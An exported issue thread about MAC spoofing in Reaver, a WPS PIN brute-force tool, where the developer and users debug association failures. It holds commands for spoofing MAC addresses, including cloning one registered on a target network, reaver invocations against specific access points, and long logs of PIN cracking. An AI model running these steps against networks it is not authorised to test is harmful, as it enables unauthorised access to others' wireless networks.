GoogleCodeExporter
commented
9 years ago Issue 71 has been merged into this issue.Original comment by cheff...@tacnetsol.com on 6 Jan 2012 at 4:42
Closed GoogleCodeExporter closed 9 years ago
GoogleCodeExporter
commented
9 years ago Issue 71 has been merged into this issue.Original comment by cheff...@tacnetsol.com on 6 Jan 2012 at 4:42
GoogleCodeExporter
commented
9 years ago any ETA on when we could expect first release?
if you needed some beta testers I am willing to participate and do some testing
for youOriginal comment by jcdento...@gmail.com on 6 Jan 2012 at 9:18
GoogleCodeExporter
commented
9 years ago Beta testers are always welcome. :)
I'm working on cutting a 1.4 release, which will likely be the last release
before porting the code into aircrack. Hopefully this should be done this
weekend and work on the aircrack port will begin in ernest.Original comment by cheff...@tacnetsol.com on 6 Jan 2012 at 9:28
GoogleCodeExporter
commented
9 years ago Haven't been able to confirm this but perhaps editing...
/etc/networking/interfaces.... with these lines might help spoofers.
auto lo
iface lo inet loopback
pre-up ifconfig wlan0 hw ether AA:BB:CC:DD:EE:FF
Connecting with a spoofed mac was impossible before i tryed this tweak.
This enables the connection.
Don't know if it will integrate with reaver or not though. Perhaps someone can
try it out ;)Original comment by ObiDanKi...@googlemail.com on 9 Jan 2012 at 3:18
GoogleCodeExporter
commented
9 years ago correction* /etc/network/interfacesOriginal comment by ObiDanKi...@googlemail.com on 9 Jan 2012 at 3:19
GoogleCodeExporter
commented
9 years ago I tried it.
I set the MAC address in /etc/network/interfaces and rebooted my machine.
it worked with aireplay-ng. I was able to associate with network I wanted
without using -h switch. Also ifconfig wlan0 showed correctly spoofed MAC
address.
on the other hand reaver associated but was complaining about out-of-order
messages again as I mentioned in thread 71 before.
if anybody is interested here is the pcap fileOriginal comment by jcdento...@gmail.com on 9 Jan 2012 at 9:43
Attachments:
GoogleCodeExporter
commented
9 years ago OK, using the latest SVN code (r85) MAC spoofing is working properly for me. I
have tested this against multiple access points from various vendors. Here are
the commands I used:
reaver@reaver-vm:~/src$ sudo ifconfig wlan1 down
reaver@reaver-vm:~/src$ sudo ifconfig wlan1 hw ether 00:01:02:03:04:05
reaver@reaver-vm:~/src$ sudo ifconfig wlan1 up
reaver@reaver-vm:~/src$ ifconfig wlan1
wlan1 Link encap:Ethernet HWaddr 00:01:02:03:04:05
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
reaver@reaver-vm:~/src$ sudo airmon-ng start wlan1
Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
706 NetworkManager
1341 wpa_supplicant
19515 dhclient
Interface Chipset Driver
wlan1 RTL8187 rtl8187 - [phy22]
(monitor mode enabled on mon0)
reaver@reaver-vm:~/src$ sudo ./reaver -i mon0 -b C0:C1:C0:A5:73:F7 -vv
--mac=00:01:02:03:04:05
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
<cheffner@tacnetsol.com>
[?] Restore previous session? [n/Y] y
[+] Restored previous session
[+] Waiting for beacon from C0:C1:C0:A5:73:F7
[+] Switching mon0 to channel 11
[+] Associated with C0:C1:C0:A5:73:F7 (ESSID: Cisco27598)
[+] Trying pin 61635678
[+] Sending EAPOL START request
[+] Sending identity response
[+] Sending M2 message
[+] Sending M4 message
[+] Sending WSC NACK
[+] Trying pin 53815675
[+] Sending EAPOL START request
[+] Sending identity response
[+] Sending M2 message
[+] Sending M4 message
[+] Sending WSC NACK
[+] Trying pin 05795673
...Original comment by cheff...@tacnetsol.com on 11 Jan 2012 at 5:56
GoogleCodeExporter
commented
9 years ago It works because you didn't change the MAC address of mon0, which got the
original address from wlan1.
You have been using the original address from your card.
If you properly change the address of mon0 as well, reaver will stop working..
just tried with r88Original comment by aristide...@gmail.com on 12 Jan 2012 at 3:23
GoogleCodeExporter
commented
9 years ago aristidesfl: It definitely works, as verified by a wireshark capture. The MAC
address used by Reaver is 00:01:02:03:04:05 and it is properly cycling through
pins. In fact, it is only if I don't change wlan1's MAC address that Reaver
fails to work with the --mac argument.
You can also set the MAC address of mon0 to 00:01:02:03:04:05, but on my system
this is unnecessary.Original comment by cheff...@tacnetsol.com on 12 Jan 2012 at 4:09
GoogleCodeExporter
commented
9 years ago I did exactly the same steps as you did and this is the output
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
<cheffner@tacnetsol.com>
[+] Waiting for beacon from 00:23:69:48:5D:CE
[+] Switching mon0 to channel 11
[!] WARNING: Failed to associate with 00:23:69:48:5D:CE (ESSID: @lien)
[!] WARNING: Failed to associate with 00:23:69:48:5D:CE (ESSID: @lien)
[!] WARNING: Failed to associate with 00:23:69:48:5D:CE (ESSID: @lien)
[!] WARNING: Failed to associate with 00:23:69:48:5D:CE (ESSID: @lien)
[!] WARNING: Failed to associate with 00:23:69:48:5D:CE (ESSID: @lien)
[!] WARNING: Failed to associate with 00:23:69:48:5D:CE (ESSID: @lien)
[+] Associated with 00:23:69:48:5D:CE (ESSID: @lien)
[+] Trying pin 12345670
[!] WARNING: Failed to associate with 00:23:69:48:5D:CE (ESSID: @lien)
[!] WARNING: Failed to associate with 00:23:69:48:5D:CE (ESSID: @lien)
[!] WARNING: Failed to associate with 00:23:69:48:5D:CE (ESSID: @lien)
[!] WARNING: Failed to associate with 00:23:69:48:5D:CE (ESSID: @lien)
[!] WARNING: Failed to associate with 00:23:69:48:5D:CE (ESSID: @lien)
[+] Sending EAPOL START request
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending M2 message
[!] WARNING: Last message not processed properly, reverting state to previous
message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending M2D message
[!] WARNING: Last message not processed properly, reverting state to previous
message
[!] WARNING: Out of order packet received, re-trasmitting last message
[!] WARNING: Last message not processed properly, reverting state to previous
message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending WSC ACK
[!] WARNING: Last message not processed properly, reverting state to previous
message
[!] WARNING: Got packet type 21 (0x15), but haven't broken the first half of
the pin yet!
[!] WARNING: Last message not processed properly, reverting state to previous
message
[!] WARNING: Got packet type 19 (0x13), but haven't broken the first half of
the pin yet!
[!] WARNING: Last message not processed properly, reverting state to previous
message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending M6 message
[!] WARNING: Last message not processed properly, reverting state to previous
message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending M6 message
[!] WARNING: Last message not processed properly, reverting state to previous
message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending M6 message
[!] WARNING: Last message not processed properly, reverting state to previous
message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending M6 message
[!] WARNING: Last message not processed properly, reverting state to previous
message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 86415675
[!] WARNING: Failed to associate with 00:23:69:48:5D:CE (ESSID: @lien)
[!] WARNING: Failed to associate with 00:23:69:48:5D:CE (ESSID: @lien)
[!] WARNING: Failed to associate with 00:23:69:48:5D:CE (ESSID: @lien)
[!] WARNING: Failed to associate with 00:23:69:48:5D:CE (ESSID: @lien)
[!] WARNING: Failed to associate with 00:23:69:48:5D:CE (ESSID: @lien)
[!] WARNING: Failed to associate with 00:23:69:48:5D:CE (ESSID: @lien)
[!] WARNING: Failed to associate with 00:23:69:48:5D:CE (ESSID: @lien)
[+] Sending EAPOL START request
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending M2 message
[!] WARNING: Last message not processed properly, reverting state to previous
message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending M2D message
[!] WARNING: Last message not processed properly, reverting state to previous
message
[!] WARNING: Out of order packet received, re-trasmitting last message
[!] WARNING: Last message not processed properly, reverting state to previous
message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending WSC ACK
[!] WARNING: Last message not processed properly, reverting state to previous
message
[!] WARNING: Got packet type 21 (0x15), but haven't broken the first half of
the pin yet!
[!] WARNING: Last message not processed properly, reverting state to previous
message
[!] WARNING: Got packet type 19 (0x13), but haven't broken the first half of
the pin yet!
[!] WARNING: Last message not processed properly, reverting state to previous
message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending M6 message
[!] WARNING: Last message not processed properly, reverting state to previous
message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending M6 message
[!] WARNING: Last message not processed properly, reverting state to previous
message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending M6 message
[!] WARNING: Last message not processed properly, reverting state to previous
message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending M6 message
[!] WARNING: Last message not processed properly, reverting state to previous
message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending M6 message
[!] WARNING: Last message not processed properly, reverting state to previous
message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending M6 message
[!] WARNING: Last message not processed properly, reverting state to previous
message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending M6 message
[!] WARNING: Last message not processed properly, reverting state to previous
message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 74225675
[!] WARNING: Failed to associate with 00:23:69:48:5D:CE (ESSID: @lien)
[+] Sending EAPOL START request
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending M2 message
[!] WARNING: Last message not processed properly, reverting state to previous
message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending M2D message
[!] WARNING: Last message not processed properly, reverting state to previous
message
[!] WARNING: Out of order packet received, re-trasmitting last message
[!] WARNING: Last message not processed properly, reverting state to previous
message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending WSC ACK
[!] WARNING: Last message not processed properly, reverting state to previous
message
[!] WARNING: Got packet type 21 (0x15), but haven't broken the first half of
the pin yet!
[!] WARNING: Last message not processed properly, reverting state to previous
message
[!] WARNING: Got packet type 19 (0x13), but haven't broken the first half of
the pin yet!
[!] WARNING: Last message not processed properly, reverting state to previous
message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending M6 message
[!] WARNING: Last message not processed properly, reverting state to previous
message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending M6 message
[!] WARNING: Last message not processed properly, reverting state to previous
message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending M6 message
[!] WARNING: Last message not processed properly, reverting state to previous
message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 58285671
[!] WARNING: Failed to associate with 00:23:69:48:5D:CE (ESSID: @lien)
[!] WARNING: Failed to associate with 00:23:69:48:5D:CE (ESSID: @lien)
[!] WARNING: Failed to associate with 00:23:69:48:5D:CE (ESSID: @lien)
[!] WARNING: Failed to associate with 00:23:69:48:5D:CE (ESSID: @lien)
[!] WARNING: Failed to associate with 00:23:69:48:5D:CE (ESSID: @lien)
[!] WARNING: Failed to associate with 00:23:69:48:5D:CE (ESSID: @lien)
[!] WARNING: Failed to associate with 00:23:69:48:5D:CE (ESSID: @lien)
[!] WARNING: Failed to associate with 00:23:69:48:5D:CE (ESSID: @lien)
it tried some pins but why are there those M6 messages?
I will run it for a longer time and see if it cracks it eventually
any idea about that output?
thanksOriginal comment by jcdento...@gmail.com on 12 Jan 2012 at 1:55
Attachments:
GoogleCodeExporter
commented
9 years ago @jc: Reaver is injecting and capturing packets fine (it can associate and start
a WPS session), so this is not a MAC spoofing issue. This looks like the same
problem that was just reported in issue 129. I'm working on a fix now. At any
rate, MAC spoofing seems to be working.Original comment by cheff...@tacnetsol.com on 12 Jan 2012 at 2:50
GoogleCodeExporter
commented
9 years ago hello,
there is definitely a difference for me depending on whether i use mac spoofing
or not: if i do not use it everything works perfectly; if i do use it reaver
has a lot of trouble associating with the AP. if i revert to the original/true
mac everything works fine again.
when i use spoofing reaver cannot associate (or associates rarely) using the -m
switch with the spoofed address, and without using the switch. if i use the -m
switch with the true(original) mac reaver works properly even with the spoofing
in place.
card is alfa awus036h
driver is rtl8187
distro is backtrack 5r1
thank you.Original comment by damonswi...@gmail.com on 15 Jan 2012 at 7:53
GoogleCodeExporter
commented
9 years ago if I change the mac address with macchanger or reaver my system cannot
associate. I have ath9k and backtrack 5r1.
Changing the mac of wlan0 does not change the mac address of mon0 for my
system. if I touch mon0 you can forget about reaver working.
Anybody have a solution?Original comment by riker1...@gmail.com on 8 Feb 2012 at 7:02
GoogleCodeExporter
commented
9 years ago [deleted comment]@jcdenton21@gmail.com
@damonswirled@gmail.com
Do the following:
1- Create an interface in monitor mode: airmon-ng start wlan0
2- Clone and its interface wlan0 and mon0 with a mac registered on the target
network.
Commands to use: ifconfig wlan0 down && macchanger -m 00:01:02:03:04:05 wlan0
&& ifconfig wlan0 up #
ifconfig mon0 down && macchanger -m 00:01:02:03:04:05 mon0 && ifconfig mon0 up #
3- When using reaver1.4 only use the reaver, do not open any more in the
terminal program, especially airodump-ng or any other monitoring program.
4- Run recover 1.4
Ex: reaver - i mon0 -b MAC_AP -c CHANNEL_AP -e NAME_AP -vv
5- The better the signal quality between your computer and the AP will have
faster results.Original comment by suzuk_1...@hotmail.com on 9 Feb 2012 at 12:35
GoogleCodeExporter
commented
9 years ago the attack sudo aireplay-ng -1 6000 -o 1 -q 10 -e apEssid -a apMac -h myMac
mon0 works fine and keeps me associated, while reaver gives me stuff like:
[+] Switching mon0 to channel 9
[+] Waiting for beacon from apMac
[!] WARNING: Failed to associate with apMac (ESSID: apEssid)
[+] Associated with apMac (ESSID: apEssid)
[+] Trying pin 12345670
[!] WARNING: Failed to associate with apMac (ESSID: apEssid)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670
[!] WARNING: Failed to associate with apMac (ESSID: apEssid)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670
[!] WARNING: Failed to associate with apMac (ESSID: apEssid)
[!] WARNING: Failed to associate with apMac (ESSID: apEssid)
[+] Sending EAPOL START request
any ideas?
Original comment by cvo...@gmail.com on 13 Feb 2012 at 11:31
GoogleCodeExporter
commented
9 years ago This has happened to me.
But unfortunately I do not know what to do to correct.
Go testing other command options to get back to work.Original comment by suzuk_1...@hotmail.com on 14 Feb 2012 at 1:30
Original issue reported on code.google.com by
cheff...@tacnetsol.comon 6 Jan 2012 at 4:39